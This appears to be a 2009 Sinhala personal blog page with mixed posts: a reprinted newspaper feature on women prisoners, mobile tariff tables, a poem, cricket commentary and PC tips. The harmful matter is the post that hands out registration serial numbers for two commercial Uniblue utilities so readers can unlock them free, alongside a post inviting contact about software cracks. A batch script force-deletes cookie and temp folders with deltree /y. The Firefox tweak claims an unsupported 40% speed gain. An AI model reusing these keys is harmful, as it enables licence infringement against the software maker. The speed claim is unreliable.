මුදිතගේ අඩවිය - යෞවනයේ ගවේෂණාත්මක අඩවිය.. අපේ කමින් හැදීවැඩී..
Banner created with MyBannerMaker.com

Tuesday, February 10, 2009

ඔබේ බ්ලොග් එකටත් ශ්‍රී ලාංකීය Radio ? Tv ? ?

















රසාස්වාදයේ උපරිමය විදින්න..ඔබේ බ්ලොග් එකටත් ශ්‍රී ලාංකීය රේඩියෝ චැනල හා රෑපවාහිනී නාලිකා එක්කර ගන්න.
html code , බාගැනීම සදහා පහත අයිකන clik කරන්න..

ශ්‍රී ලාංකීය රේඩියෝ කලාව..
ශ්‍රී ලාංකීය රෑපවාහිනී කලාව..

රසාස්වාදයේ උපරිමය විදින්න.. ඔබ තවත් පුමාද වෙනවාද???

.....සිරගෙදරින් යහමගට.....


විවිධ චෝදනා මත අධිකරණයෙන් සිර දඬුවම් ලබා සිපිරි ගෙදරට පැමිණෙන කාන්තාවන් දෙස බොහෝ දෙනා බලන්නේ අවඥා සහගතව ය. එහෙත් ඔවුන් ඒ තත්ත්වයට පත් වී ඇත්තේ එසේ අවඥා සහගත ඇසින් බලන පුද්ගලයන් වැනි ම මිනිසුන් නිසා ය.

උගත් යැයි කියා ගන්නා, විභාග සමත් වී සහතික ලබා ගෙන සිටින අය ද රාජකාරිවල දී නීති විරෝධීව කටයුතු කිරීම නිසා සිරගෙදරට පැමිණ සිටිති.

ඔවුන් මෙතැන දී ද උගත්කමෙන් හිස උදුම්මා ගෙන අහංකාරකම් පෙන්නන්නට ගොස් අනෙක් සාමාන්‍ය සිරකාරියන්ගෙන් ගුටි කා මට්ටු වන අවස්ථා ද බහුල ය.

එසේ ම මත්ද්‍රව්‍ය වෙළෙඳ්‍රම හෝ අනාචාරයේ හැසිරීමේ චෝදනා මත දඬුවම් ලබා පැමිණෙන බොහෝ නූගත් කාන්තාවන් ළඟ ඉතා වටිනා ගති ගුණ වෙයි.

ඔව්හු කෙනෙක් රෝගී වූ විට තමන් ගේ පවුලේ කෙනකුට මෙන් සාත්තු සප්පායම් කරති. රෙදි සෝදා දෙති. වතුර උණු කොට උණු පැනින් නාවා පිරිසිදු කරති.

අනාචාරයේ හැසිරීමේ චෝදනාවට දඬුවම් ලබා පැමිණ සිටින සුමනාවතී ද එවැන්නියකි. ඇය සිරගෙදරට පැමිණි දින අනිකුත් අය ගෙන් කොන් වී පැත්තකට වී සිටියා ය.

ඈ දෙස පරීක්‍ෂාවෙන් බලා සිටි නිලධාරිනියෝ ඇය සමඟ සුහදව කතා කොට සාමාන්‍ය වැඩවලට සහභාගි කරවා ගත්හ.

පසුව හිතවත් වී ආගමික වැඩසටහන්වලට ඇය යොමු කැරිණි. සුමනාවතී දැන් ඉතා ම නිහතමානී කාරුණික කාන්තාවකි.

කාන්තා අංශයේ කවුරුන් හෝ වේවා අසනීප වූ විට සුමනාවතී ඉදිරිපත් වී සාත්තු සප්පායම් කරන්නී ය. වයස්ගත දුර්වල හා මහලු අපිරිසුදු රෝගීන් පවා උණු පැනින් නාවා පිරිසිදු කොට සාත්තු සප්පායම් කරයි.

”මගෙත් අම්මා නැහැනෙ. මට මෙයා මගේ අම්මා වගෙයි. පුංචි කාලෙ ඉඳල ම මට අම්මා ගේ උණුහුම ලැබුණේ නෑ. අපේ තාත්තා හැම දා ම බීගෙන ඇවිත් අම්මාට ගහනවා, බනිනවා.

අම්මා නිතර ම කල් ගෙව්වේ හිත් වේදනාවෙන්. අපේ අම්මා නිතර ම මා තුරුලු කරගෙන කිව්වා “මං ජීවත්වෙන්නේ මෙන්න මේ කිරිසප්පයා නිසයි” කියලා. එතකොට මට වයස අවුරුදු දෙකක් විතර ඇති.

මේ අතරේ අම්මා උණ හෙම්බිරිස්සාව හැදිලා ඒක නිව්මෝනියාවට හැරිලා මැරුණා. ඉතින් අම්මා කෙනෙකු ගේ ආදරේ නැතුව හැදුණු මං මේ මගේ අම්මය කියලා හිතාගෙන සාත්තු කරනවා යැයි විමලාවතී පවසයි.

විමලාවතී වගේ ම තවත් තරුණ කාන්තාවකි නාලිනී. ඇයට වයස අවුරුදු හතළිහක් වුව ද තිස් පහක් තරමවත් පෙනෙන්නට නැත. ඇය කොළඹ නාගරිකය තුළ ජීවත්වන “බඹසර ලියකි” (ඔවුන් හඳුන්වා ගනු ලබන්නේ “බඹසර ලියන්” යන නාමයෙනි.) නාලිනී ඉතා විවෘතව කතා කරන්නියකි.

”මහත්තයා ඔය සමාජයේ ලොකු ලොක්කො අපිව හෙළාදැකල “ගණිකාවොයි” කියා හැඳින්නුවාට ඕකුන් ම තමයි අපව මේ තත්ත්වෙට පත් කළේ. සමහරු සුප‍්‍රසිද්ධ දේශපාලනඥයෝ.

ඔයින් එකෙක් තමයි මට රස්සාවක් දෙනවැයි කියලා රවටලා එක්ක ගෙන ගිහින් මා අමාරුවෙ දැම්මේ. උන්ට කවුරුත් දොස් කියන්නෙ නෑ. ඔය ලොකු ලොක්කන් ගැන කට ඇරියොත් අප මරාදාවි.”

අප හොයා ගෙන එන ඔය ලොකු ලොකු වැදගත්තු හුඟ දෙනෙක් අහිංසකයෝ. පව් කියලා හිතෙනවා. උන් ගේ ගෑනු යස්සනියෝ. මිනිහට හරිහැටි ආදරෙන් සලකන්නේ නැති නිසා අප හොයා ගෙන එනවා.

තමන් ගේ නෝනලගෙ වැරැදි අඩු පාඩු නපුරුකම් ඔක්කොම අප එක්ක කියනවා. සමහරුන් ගේ නෝනලා වෙන මිනිස්සු එක්ක - ඩ‍්‍රයිවර් සමඟ පවා යන නිසා ඒ මහත්තුරු අප සොයා ගෙන එනවා.”

තව මහත්තයෙක් එනවා. එයත් ලොක්කෙක්. හරිම ලෝබ කුණා. හෝටල් කාමරේකට, කෑමට බීමට වියදම් කරන්න අකමැතියි. එයා එන්නේ පොදු වැසිකිළිවලට. අපි යන්නෙත් පළමුවෙන් අපේ ගාස්තුව අතට අරගෙන.

එයාගෙන් ම ගාණක් ගෙවලා අපේ යහළුවෙක් තියනවා පාර බලන්න. පොලිසියෙන් එනවා ද කියා බලන්න. අපි ගාස්තුව අරගෙන වැසිකිළියට ගිය හැටියේ අපේ යාළුවා කෑ ගහනවා (බොරුවට) ඔන්න පොලීසියෙන් කියලා.

මහත්තයා පණ කඩාගෙන දුවනවා, කාර් එකට, ගිහින් පැනලා යනවා. ඒ මහත්තයාට අපි කියන්නේ ”ටොයිලට් මහත්තයා” කියලා.

ඊළඟට අපට මුණගැසුණේ රාණි ය. රාණි ද ඉතා සැහැල්ලුවෙන් විවෘතව කතා කරන තැනැත්තියකි. “මහත්තයා මේක ලෝකයේ පැරැණි ම රැකියාවනෙ. අපි තරුණ කාලෙ දවසට රුපියල් 10000 - 15000 හම්බ කළා.

හොඳට කාල බීල කාමර කුලී ගෙවා ගෙන විනෝදෙන් හිටියා. කොළඹ කොම්පැණියක රස්සාවක් කරනවා කියලා ගමට ගිහින් මාසයකට සැරයක් අම්මා තාත්තාටත් උදව් කළා. ගමේ ගේ හදන්නත් හුඟක් උදව් කළා.

අම්මා තාත්තා මළාට පස්සේ ගෙදර ප‍්‍රධානියා වුණේ අය්යගෙ ගෑනි. ඒකිගෙ ගැම්බර් බලන්න බැරුව මම ගමේ යෑමත් අතහැරියා. අපේ ජොබ් එකට පොලිසියෙන් කරදර එන කොට “මැඩම්” ලා යටතේ මේ ජොබ් එක කරන්න සිද්ධ වුණා. එතකොට “මැඩම්” තමයි පව් ගෙවන්නේ.

මේ ජොබ් එකේ දී අපට පුදුම මිනිස්සු මුණ ගැහෙනවා. ආණ්ඩුවේ ඉහළ ජොබ් එකක් කරන මහත්තයකුට මගේ සේවය අවශ්‍ය වුණා. හොඳ හෝටල්වල තමයි නවාතැන් ගත්තේ. නෝනගෙ නපුරුකම් කිය කියා අඬනවා.

අපට තියෙන්නේ “අනේ! අඬන්න එපා රත්තරං මං ඔයාට ආදරෙයි” කිය කියා ඔලුව අත ගාන්න. එතකොට පොඩි දරුවෙක් වගේ නිදා ගන්නවා. ඒ වගේ ම ඒ මහත්තයාට බත් කවන්න ඕනෑ. “ආ... ආ... මේ කටත් කන්න පැටියෝ” කිය කියා කවන්න ඕනෑ.

එහෙම කවන කොට ෆුල් කෑම දෙකක් ම කනවා. ගෙදරදි කන්න බැරිලු. නෝනාගෙ මූණ දැක්කම කන්න බැරුව යනවාලු. ඒ මහත්තයාට අපි කියන්නේ “හබුං කටා මහත්තයා”. ඒ මහත්තයා එක්ක ගියාම අපට තියෙන්නෙ අඬන්න එපා කියලා නළවන එකයි.

බත් කවන එකයි විතරයි. එච්චරයි ජොබ් එක. ඒ වුණාට හෝටල් කාමරේ ඉන්න නිසා සමාජය මනින්නෙ අප ගණිකාවො කියලම යි.

සුසිලා කෝටිපති ව්‍යාපාරිකයකු ගේ බිරියකි. ඇගේ කතාවත් ඇසිය යුත්තකි. “මගේ මහත්තයා උදේ පාන්දර අවදි වුණු වේලාවේ ඉඳල ම ව්‍යාපාර කටයුතු. ගෙදර එන කොට රෑ 10 - 11 වෙනවා.

කිසිම සහජීවනයක් නෑ. ගෙවල් දොරවල් යාන වාහන කෑම බීම කොයි තරම් තිබුණත් වැඩක් තියෙනව ද මහත්තයා තමන්ගෙ මිනිහත් එක්ක විනෝදෙන් සතුටෙන් ඉන්න නැත්නම්. නෑ ගෙදරක ගමනක් බිමනක් යන්නෙ නැත්නම්.

ඒ මනුස්සය සල්ලිවලට ම තනිවෙලා. මගේ ජීවිතය හරිම පාළු අඳුරු එකක් වුණා. ඔය අතරෙ තමයි මම සරත් ව අඳුනා ගත්තෙ. අපේ ගෙවල් කිට්ටුව ගෙදරක බෝඩිං වෙලා රස්සාවට ගිය තරුණයෙක්.

පස්සෙ මහත්තයාටත් මේ ගැන ඉව වැටී මට ගහන්න බනින්න ගත්තා. බැරි ම තැන මම සරත් එක්ක ජීවත්වෙන්න හිතාගෙන පාන්දර නිදාගෙන හිටිය මහත්තයාගෙ බෙල්ල කැපුවා.

හොරෙක් ඇවිත් බෙල්ල කැපුවා කියලා මං කීවාට පොලිසිය ඒක පිළිගත්තෙ නෑ. පස්සෙ බලන කොට සරතුත් කසාද බැඳපු මිනිහෙක්. එයාත් රස්සාවෙන් මාරු වෙලා ඈතට ගිහින්. දැන් මට ඇප දෙන්නවත් කෙනෙක් නෑ. මගේ පවුලෙ අයත් මා අත ඇරලා.”

මෙවැනි කාන්තාවෝ සිර ගෙදර දී එක බත් පත බෙදා ගෙන අනුභව කරති. රෝගීන්ට උවටැන් කරති. එකට ගී කියති. උදේ හවස ආගමික වතාවත්වල යෙදෙති. එහෙත් මෙතනින් එළියට ගිය දාට ඔවුනට කා ගේ පිහිට ද?


  • 2008-04-20 ඉරිදා දින සිඑමිණ පුවත්පත ඇසුරෙනි..

Airtel ගාස්තු සංසංදනය - Mobitel - Dialog - Hutch - Tigo සමග..








Airtel Dialog Mobitel Tigo Hutch







Outgoing (Call)












Within The Network Per Minute Rs. 2 Rs. 3 Rs. 2 Rs. 3 Rs. 2
Per Second Rs. 0.03 Rs. 0.05 Rs. 0.03 Rs. 0.05 Rs. 0.03







Other Network Per Minute Rs. 2 Rs. 5 Rs. 4 Rs. 6 Rs. 5
Per Second Rs. 0.03 Rs. 0.08 Rs. 0.06 Rs. 0.10 Rs. 0.08







Incoming (Call)












Within The Network
Free Free Free Free Free







Other Network Per Minute Free Rs. 3 Rs. 2 Free Rs. 5

Free Duration Totally 2 2 Totally 1

(Minute)



මාර්තු 31 න් පසු ::

  1. Airtel Outgoing Call Charges Will Be Rs. 2.50 (Without Rental) After March 31st For Prepaid Users (Not For Postpaid)
  2. But Prepaid Users Can Talk For Rs.2 If They Pay A Monthly Rental Of Rs. 50
Dialog සමග සංසංදනය ::

  • Outgoing Other Network Rs. 6.35 Per minute
  • Dialog To Dialog Rs. 3.81 per minute
  • SMS Other Network Rs. 2.54
  • SMS To D2D Rs. 1.27
  • Incoming 2 Minute Free After That Rs. 3.81 per minute

(Free From D2D Only)

Mobitel සමග සංසංදනය ::

  • Outgoing Other Network Rs. 5.08 Per minute
  • M2M Rs. 2.54 per minute
  • SMS Other Network Rs. 2.54
  • SMS To M2M Rs. 1.27
  • Incoming 2 Minute Free After That Rs. 2.54 per minute
(Free From LandLine And Mobitel)

Airtel PrePaid ගාස්තු ::

(Airtel Just Launched And Their Services Like Dialog Kit Doubble, My10 And Smart Freedom Still On Testing Mode And They Will Give Those Feature To You Soon.)

Any Network Rs. 2.54 (Call)
Any Network Rs. 1.27 (SMS)
Incoming Free


  • VAS ::


  • GPRS - 3G - HSPA Settings

APN : AirtelLive
Proxy : 10.200.184.86
Port : 8080
Homepage : http://wap.airtel.lk
Authentication : Normal
Data Bearer : Packet Data

  • MMS Settings

APN : AirtelLive
Proxy : 10.200.184.86
Port : 8080
Homepage : http://mms.airtel.lk
Authentication : Normal
Data Bearer : Packet Data

  • Welcome Tune

Call 7551 (Voice) or *888# (USSD)

  • Subscription Portal

Dial *999# (USSD)

  • Airtel SriLanka

Dial *444# (USSD)












..ප්‍රබුද්ධ - මහගම සේකර..


"ඔබ හිනැහෙන විට
මුලු ලොව
ඔබ සමගින් සිනාසෙයි
ඔබ වැලපෙන විට
මුලු ලොව
ඔබ අතහැර සිනාසෙයි.."



"සංක්‍රාන්ති කලියුගයේ
හෙල්ලුම් කන සමාජයේ
පාලම් උඩ
මේ මගේ නෑයාය
මිතුරාය - සැමියාය - බිරින්දය
විශ්වාසයක් නොමැත
අන්තෝ ජටා බහි ජටා.."



"සිටියෝ විසිත්ත කාමරයෙහි
කලු කබා මහත ටයි
තරබාරැ ප්‍රභූවරැ
පීරා ඈතින් කෙස් ගෙනත්
තට්ටය යන්තමින් වසා ගත්

සිටියෝ මෝරපු ගැහැනු
බැන්ද උස් කොණ්ඩා හා
ගන දෙතොල් උල් නිය ඇති
බලමින් නෙත් කොනින් ගර්වයන්
මැකෙන රෑ සිරියට මුක්කු ගසමින්

සිටියෝ ගැටවරයෝ ගැටවරියෝ
අවුල් දික් කෙස් වලු ඇති
පුම ඉතිරි ලිගු වෙනස නැති
යන එන මගක් නොම දැන
අතර මං වූවන් මෙන.."


උපුටාගැනීම :: ප්‍රබුද්ධ - මහගම සේකර

Softwear ??? ඒත් කෝ සල්ලි....


මීට කලින් මම ඉදිරිපත් කල ලිපියකින් ඔබට නොමිලයේ ලබාගතහැකි මෟදුකාංගයක් ගැන කථාකලා සමහරවිට ඔබට මතක ඇති. නමුත් මේ පිලිබදව මතුවූ විවිධ අර්බුද හේතුවෙන් මෙම ලිපිය ලිවීමට මා තීරණය කලා.
තුන්වන ලෝකයේ දිළිදු රටක් වන අපේ පුංචි රටේ පරිගණකයක් මිලදීගන්නට තියා පරිගණකයක් දැකලවත් නැති අය කොච්චර නම් ඉන්නවාද? එහෙව් රටක ජීවත්වන අපේ උදවිය එදිනෙදා ජීවිතය ගෙනයන්නෙත් බොහොම අමාරැවෙන් කියනඑක අමුතුවෙන් කිවයුතු දෙයක් නොවේ.
පරිගණකයක් මිලදී ගත්තද, අදාල මෟදුකාංග සොයාගැනීමට (මිලදීගැනීමට) ක්‍රමයක් නොමැති කමින් , wrestling/hindi films/english films/ අසභ්‍ය චිත්‍රපට වල පිහිට සොයායන අය බුරැතුපිටින් ඉන්නවා. නව තාක්ෂණයේ දියුණුවත් සමග ඉදිරියට යාමට මොවුන්ටද ආසාවන් නැතැයි පැවසීම සැබවින්ම මුසාවකි. නමුත් මොවුන්ට නව තාක්ෂණයේ දියුණුව දින 30කට හෝ දින 21කට සීමාවීම සැබවින්ම ඛේදජනක සිද්දියකි. එවන් වූ සීමාමායිම් බිද මෙවන් වූ තාරැණ්‍යයට යන්තම් හෝ අත්වැලක් වීම අප සතු යුතුකමකි.

අන්තර්ජාලයේ විවිධ වූ softwear crack කිරීම් තිබුනද, ඒවායේ අන්තර්ගතය ගැන මාහට කිසිදු පැහැදීමක් නැත.තිබුනද, ඇතැම් ඒවා මුදලටය. ඇතැම් ඒවායේ අන්තර්ගතය අසභ්‍ය වෙළද දැන්වීම් වලින් පිරී ඉතිරී ගොස්ය. මේ හේතූන් නිසාවෙන් ශ්‍රී ලංකාවේ අපට බොහෝවිට පාවිච්චි කරන්න ලැබෙන්නේ නොමිලයේ ලබාදෙන trial version ය. නැතිනම් හොර copy ය.

වැඩි විස්තර සදහා :: cracker0007@gmail.com

Monday, February 9, 2009

Cookies වදයක්ද???


ඔබ අන්තර්ජාලයේ නිතර සැරිසරන අයෙක්ද? එසේනම් ඔබටත් cookies කරදර නැතුවාම නොවේ. අන්තර්ජාල කුණුගොඩවල් වනමේවා ඔබගේ වෙබ් බ්‍රවුසරය මගින්ද, පරිගණකය තුලට ඒම නවත්වා ගතහැක. නමුත් සමහරවෙලාවල් වලදී මේවා ප්‍රයෝජනවත් වන අවස්ථාද තිබේ. සමහර CGI pages අදාල cookies නොමැතිව ක්‍රියාකල නොහැක. ඔබ web site එකකට password එකක් ඇතුලත් කිරීමේදී එම අදාල web site එක එය මතක තබාගැනීම සදහා cookiees භාවිතා කරයි. නමුත් එය කෙසේවෙතත් මෙසේ අන්තර්ජාලය මගින් පැමිනෙන කුණුගොඩවල් සියදහස් ගණන් ඉවත්කර ගැනීම සදහා දැන් ඔබට ක්ෂණිකව , කැමති වෙලාවක සිදුකල හැකි පුංචිපහේ program එකක් පිලිබදවයි, මේ කථාව...

  • පහත දැක්වෙන codes , notebook එකට paste කරගන්න..

  • cls
    REM *******************************************
    REM **Cookie Kill Program Will not work in NT**
    REM *******************************************

    deltree /y c:\windows\cookies\*.*
    deltree /y c:\windows\tempor~1\*.*
    pause
    cls
    REM Cookies deleted!
  • එය cookiekill.bat යන නමින් desktop එකතුල save කරන්න.
  • සෑදුන cookikill.bat මත doubleclik කරන්න. ඔබ පරිගණකයේ ඇති සියලුම cookies , delete වී යාවි....

අපිට mouse එකක් වැඩක් නෑ...


පරිගණකය දියුණුවීමත් සමග අපට බොහෝ දේ ඉතාඉක්මනින් කරගැනීමට හැකියාව උදාවුනා. එහෙව් වූ පරිගණකයේ කාර්යක්ෂමතාවය වැඩිකිරීම සදහා එක්වූ අංගයක් වන "මවුසය"(mouse) අද අපට නැතුවම බැරි අංගයක් බවට පත්වී හමාරයි. මවුසයක් නැතුව කොහොමද, වැඩකරන්නේ ???? හිතාගන්නවත් බැරිතරම් ය. දැන්වත් හිතන්න පුරැදුවෙන්න. මවුසය නොමැතිව keyboard එක භාවිතයෙන් පමණක් වුවද අපට එදිනෙදා පරිගණකයේ වැඩකල හැකිය. කොහොමද එහෙම වැඩකරන්නේ??? බයවෙන්න එපා!! ඒකට තමයි shortcuts තියෙන්නේ..
keyboard එක පමණක් භාවිතයෙන් පරිගණකයක වැඩකරන ආකාරය පියවරෙන් පියවර ඉගෙනගන්න MakeUseof.com කියන වෙබ් අඩවියෙන් දැන් ඔබට පුලුවන්..


  • Windows shortcut keys බාගන්න ::
  • Firefox shortcut keys බාගන්න ::
  • Google Search Tips & Shortcuts keys බාගන්න ::
  • Internet Explorer Shortcuts keys බාගන්න ::
  • Gmail Shortcuts keys බාගන්න ::




Sunday, February 8, 2009

T20 ලෝක කුසලානය 2009 - එංගලන්තයේදී...


2009 වසර තවත් ලෝක කුසලාන තරගාවලියකට අරඅදින වසරක් බවට මේ වනවිටත් පත්වී හමාරයි. ඒ වෙනකිසිවක් නිසා නොව T20 ලෝක කුසලාන තරගාවලිය ජුනි මාසයේදී ක්‍රිකට් උපන් රටේදීම(එංගලන්තයේදී) ආරම්භවන බැවිනි. මේවනවිටත් ඒ සදහා සියල්ල සූදානම්ය. 2009 ජුනි මස 05 දින ආරම්භවීමට නියමිත මෙම තරගාවලිය සදහා රටවල් 12ක් සහභාගි වීමට නියමිතයි. ඒ සදහා සහභාගිවන රටවල් අදාල කාණ්ඩ අනුව මෙසේය..

Group A

Group B

Group C

Group D

India

Pakistan

Australia

New Zealand

Bangladesh

England

Sri Lanka

South Africa

Zimbabwe

Associate 1

West Indies

Associate 2


මෙහි assosiate1 හා assosiate2 ලෙස දක්වා ඇත්තේ තවමත් සුදුසුකම් නොලැබූ රටවල් ය. Bermuda, Canada, Ireland, Kenya, Netherlands සහ Scotland යන රටවල් මේවනවිටත් ඒ සදහා සුදුසුකම් ලබාගැනීමේ අරමුනින් තරග වැදෙමින් සිටියි.

2009 ජුනි මස 24 දින දක්වා මෙම තරගාවලිය පැවැත්වීමට නියමිතයි.
ඒ සදහා වූ තරග කාලසටහන මෙසේයි..

Firefox වල speed එක 40% කින් වැඩිකරගමු..


ඔබ භාවිතා කරන්නේ Firefox වෙබ් බ්‍රවුසරයද? එහි වේගය ගැන ඔබ තෘප්තිමත්ද? Firefox වල speed එක 40% කින් විතර වැඩිකරගන්න පුලුවන්නම්, අනේ කොච්චර හොදද?
හරිම ලේසියි, මෙන්න මෙච්චරයි කරන්න තියෙන්නෙ..

  • 1 පියවර :: Firefox open කරගන්න.
  • 2 පියවර :: එහි address bar එකේ පහත දැක්වෙන දෙය type කරන්න.
    about:config
    ඉන්පසු enter කරන්න.
  • 3 පියවර ::browser.tabs.showSingleWindowModePrefs යන line එක සොයාගන්න.
    (ඉගි:: 'b'අකුර type කරන්න. එවිට වඩාත් පහසුයි. )
  • 4 පියවර :: browser.tabs.showSingleWindowModePrefs මත doubleclik කරන්න. එවිට එම line එක true වේ.
    සටහන:: Firefox version 1.5 වල මෙම line එක දිස්වන්නේ singlewindow.openintabs යන නමිනි.
  • 5 පියවර :: මීලගට firefox සදහා යොදන ram ධාරිතාවය වැඩිකරගැනීම සදහා pipeline හි සිදුකරන වෙනස්කම් සලකා බලමු.
  • 6 පියවර :: කලින් document එකේම network.http.pipelining යන line එක මත doubleclik කර එම line එක true කරගන්න.
  • 7 පියවර ::අවසානයේ අපි maximum pipeline එක 100 දක්වා වැඩිකරගත යුතුය, ඒ සදහා network.http.pipelining.maxrequests යන line එකමත Double click කලවිට එන dialog box එකමත දැන් ඇති අගය වන 4 වෙනුවට 100 යොදන්න.

මෙය save කලයුතු වන්නේනෑ. firefox restart කිරීමෙන් ක්ෂණිකව ඔබගේ firefoxහි වේගය 40%කින් වැඩිවී ඇතිබව ඔබට පෙනීයනු ඇත.

ඉන්දියානු පිලේ ශ්‍රී ලංකා තරග සංචාරය...



එක්දින තරග 5 කින් හා 20-20 තරගයකින් සමන්විත ඉන්දීය-ශ්‍රී ලංකා තරගාවලියේ තරග 4ක් දැනටමත් ඉවරයි. මම මේ ලිපිය ලියන විට 5වන තරගයේ භාගයක් ඉවරවෙලත් ඉවරයි.
කොහොමහරි මේ දක්වා පැවති තරග 4 ජය ඉන්දියානු කණ්ඩායම ලබාගෙන ඉවරයි. ඒ අනුව තරගාවලියේ ජයත් දැනටම ඉන්දියානු කණ්ඩායම සතුවී හමාරයි. ඇත්තටම අපේ කණ්ඩායමට මොකක්ද උනේ??
කිසිම දෙයක් උනේ නෑ.. මොකද ශ්‍රී ලංකා කණ්ඩායම ඉන්දියාවට පරාදඋනේ ඕනකමින් නිසා... මං දන්නව මේක ඇහුවහම ටිකක් විතර තරහයනව කියල, ඒඋනාට අපේ කොල්ලොන්ට ඒක එහෙම කරන්න උනා.. ඒ ඇයිද කියල දන්නවද?? දන්නැත්නම් දැනගන්න, මේකට කරැණු 4 ක් තියෙනවා..

  • ඉන්දියාව අපගේ අසල්වැසි රාජ්‍ය නිසා ඔවුන් තරහාකර ගැනීමට අකමැති නිසා..
  • අර්ජුන සිටිනතුරැ ලංකාවට කණ්ඩායමක් එවන්නේ නැතැයි ප්‍රකාෂකල ඉන්දීය බලධාරීන්ට ගරැකිරීම පිණිස..
  • ක්‍රීඩා ඇමති ලොකුගේට ක්‍රීඩා තරග නැරඹීම පුරැදුකරනු පිණිස..
  • කොටි සංවිධානය සතුටුකිරීම පිණිස..
සාධාරණ කරැණු ටික නේද? පකිස්ථාන සංචාරයත් දිනපු එකේ මේක පැරදුනාට ඉතින් දුක නෑ කියල, අර හේතු ටික බලපුවහම පේනව නේද???/

Saturday, February 7, 2009

Registry Cleaner මෟදුකාංග සල්ලි දීලා ගත්ත කාලෙ ඉවරයි....


ඔබ Registry Cleaner මෟදුකාංග පාවිච්චි කරනවාද? ඔබ පාවිච්චි කරන්නේ අන්තර්ජාලයේ නොමිලයේ ලබාදෙන Registry Cleaner ද?? නිකං දෙන දෙමල පත්තරේ හරිගන්න කියලනේ අපේ මුතුන්මිත්තො අපට කියල තියෙන්නෙ නේද? ඒ වුනාට ලාබ බඩුවෙ හිලක් තියෙනව කියල, කියල තියෙන්නෙත් ඒ උදවියම නේද? කොහොමින් කොහොම හරි අර නිකං දෙන Registry Cleaner මෟදුකාංග අපේ පරිගණකයේ දහස්ගනන් වැරදි හොයල දෙනව නේද? ඒ වුනාට එයාල ඒ වැරදි නිවැරදිකරල අපේ පරිගණකය clean කරල දෙන්නෙ නෑ නේද? එයාල කියනව අපේ මෟදුකාංගය සල්ලි දීල අරගන්න එතකොට අපි වැරදි නිවැරදිකරල පරිගණකය clean කරල දෙන්නම් කියලා. අනේ අනිච්චං!! නිකං කියල දීල දැන් කියනව සල්ලි දීල ගන්න කියල.

මෙවැනි මෟදුකාංග වලට ඔබ කොපමනනම් අහුවෙලා තියෙනවද? හැබැයි අදින් පස්සෙ නම් ඔබට එහෙම රැවටෙන්න වෙන්නේ නෑ. මම අද කියන්නෙ එවැනි Registry Cleaner මෟදුකාංගයක් ගැන..

  • මෟදුකාංගයේ නම :: Uniblue Registry Booster 2009
  • අවශ්‍යතාවයන් ::

    Intel Pentium 3 500MHz or Equivalent
    256MB RAM
    100MB free hard disk space
    Windows XP / Vista (32-bit)

  • Registration no :: PS-00Z7GH-CQ23K5-FU5RB9-81RN5H
Uniblue Registry Booster 2009 මෟදුකාංගය බාගන්න ::



මෟදුකාංගය බාගන්න ඉන්පසු එය ඔබගේ පරිගණකයට install කර ගන්න. ඉන්පසු Reg no එක අදාල ස්ථානයට paste කරන්න.
මෙහි සහෝදර මෟදුකාංගය බාගන්න නම් , ඒ ගැනත් දැන ගන්න.

  • මෟදුකාංගයේ නම :: Uniblue Speed Up my Pc 2009
  • අවශ්‍යතාවයන් ::
Intel Pentium 3 400MHz or Equivalent
96MB RAM
200MB free hard disk space
Windows XP / Vista (32-bit)
.Net Framework 3.5
  • Registration no ::PS-00Z7GH-M5TY2V-K3YZ6Y-C3YM47
Uniblue Speed Up my Pc 2009 මෟදුකාංගය බාගන්න ::


මෟදුකාංගය බාගන්න ඉන්පසු එය ඔබගේ පරිගණකයට install කර ගන්න. ඉන්පසු Reg no එක අදාල ස්ථානයට paste කරන්න.

වෛරස් නිර්මාණ කථා ඉවරයි..


මගේ කලින් ලිපිවලින් මම වෛරසය නිර්මාණය කරන ආකාරය ඉදිරිපත්කලා. නමුත් එවැනි දේ විනාශකාරී ලෙස යොදාගැනීමට බ්ලොග් බලන දෙපා සුනඛයො උත්සාහකරන්න පුලුවන්. ඒකනිසා මම වෛරස් නිර්මාණය පිලිබද විවිධ දේ ලිවීම නවතා දැමීමට තීරණය කලා.. මේ ගැන මා දැනුවත් කල සැමට ස්තුතියි..

CD/DVD drive එක desktop එකේ ඉදං open කරමු.....



මගේ කලින් ලිපිවලින් මම වෛරසය නිර්මාණය කරන ආකාරය ඉදිරිපත්කලා. නමුත් එවැනි දේ විනාශකාරී ලෙස යොදාගැනීමට බ්ලොග් බලන දෙපා සුනඛයො උත්සාහකරන්න පුලුවන්. ඒකනිසා මම වෛරස් නිර්මාණය පිලිබද විවිධ දේ ලිවීම නවතා දැමීමට තීරණය කලා..

නමුත් ඔයාලට ප්‍රයෝජනවත් දේ ලිවීම නම් නතර කරන්නේ නෑ. එහි පළමු පියවර විධියට මම තීරණය කලා ඔයාලගෙ CD/DVD drive එක desktop එකේ ඉදං open කරගන්න විධියක් කියලා දෙන්න. මෙමගින් ඔබට ඔබේ CD/DVD drive එක ආරක්ෂාකාරීව පාවිච්චි කරන්න පුලුවන්.

1 පියවර :: notepad එක open කරගන්න.

2 පියවර :: එහි පහත දැක්වෙන දෑ type කරන්න.

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If

3 පියවර :: ඉන්පසු මෙය name.vbs ලෙස save කරන්න.

( Name වෙනුවටද ඔබට කැමති නමක් type කලහැක. නමුත් .vbs අනිවාර්යයි.)
(save කරන විට desktop එ
කේ save කරන්න. )

4 පියවර :: දැන් ඔබට ඔබේ CD/DVD drive එක desktop එකේ සිට open කරන්න පුඑවන්..(name.vbs මත dobleclik කරන්න)

HTML වදයක්ද???


ඔබ website එකක් හරි blog එකක් පවත්වාගෙන යනවානම් ඔබට HTML code වල ඇති වැදගත්කම වැටහෙනවා ඇති. නමුත් ඔබ HTML code ගැන හරියටම දන්නෙ නැත්නම් ඔබට ඔබේ website එක හරි blog එක පවත්වාගෙන යෑම හරිම හිසරදයක් වෙනවා නේද?

නමුත් http://www.hypergurl.com වෙබ් අඩවියට පිංසිද්ද වෙන්න ඒ කරදරයත් ඉවරයි..
ඔබට ඔබේම කියා website එකක් හරි blog එකක් HTML code භාවිතාකර ක්ෂණිකව සාදාගැනීමේ හැකියාව මෙමගින් ලැබෙනවා. මේ සදහා ඔබ HTML code ගැන කිසිදු දැනීමක් අවශ්‍ය වන්නේ නැහැ.

මෙම website එක මගින් ඔබට ලබාගත හැකි අනෙකුත් සේවාවන් ::

  • Html for beginers
  • 43 Javascript Generators
  • Color Match Generator
  • Digg Button Generator
  • Triple Background Generator
  • Tutorials
    • Paint Shop Pro Tutorials
    • Photoshop Tutorials
